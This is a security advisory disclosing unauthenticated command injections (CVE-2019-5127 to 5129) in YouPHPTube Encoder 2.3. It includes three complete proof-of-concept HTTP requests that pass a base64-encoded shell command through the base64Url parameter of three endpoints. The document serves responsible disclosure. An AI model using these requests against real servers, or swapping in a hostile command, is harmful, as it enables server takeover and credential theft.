CVE-2019-5127 - CVE-2019-5129
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. Specially crafted web requests can cause commands to be executed on the server. An attacker can send a web request with parameters containing specific parameter to trigger these vulnerabilities, potentially allowing exfiltration of the database or user credentials or even compromise the underlying operating system.
YouPHPTube Encoder 2.3
https://www.youphptube.com/
https://github.com/YouPHPTube/YouPHPTube-Encoder/
10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
Multiple command injections have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server.
The following URLs and parameters have been confirmed to suffer from command injections and could be exploited by unauthenticated attackers:
The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack:
GET /YouPHPTube-Encoder/objects/getImage.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=png HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
GET /YouPHPTube-Encoder/objects/getImageMP4.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=jpg HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
The parameter base64Url in /objects/getSpiritsFromVideo.php is vulnerable to a command injection attack.
GET /YouPHPTube-Encoder/objects/getSpiritsFromVideo.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=jpg HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
2019-10-16 - Vendor Disclosure
2019-10-16 - Vendor Patched
2019-10-17 - Public Release
Discovered by Yuri Kramarz of Security Advisory EMEAR.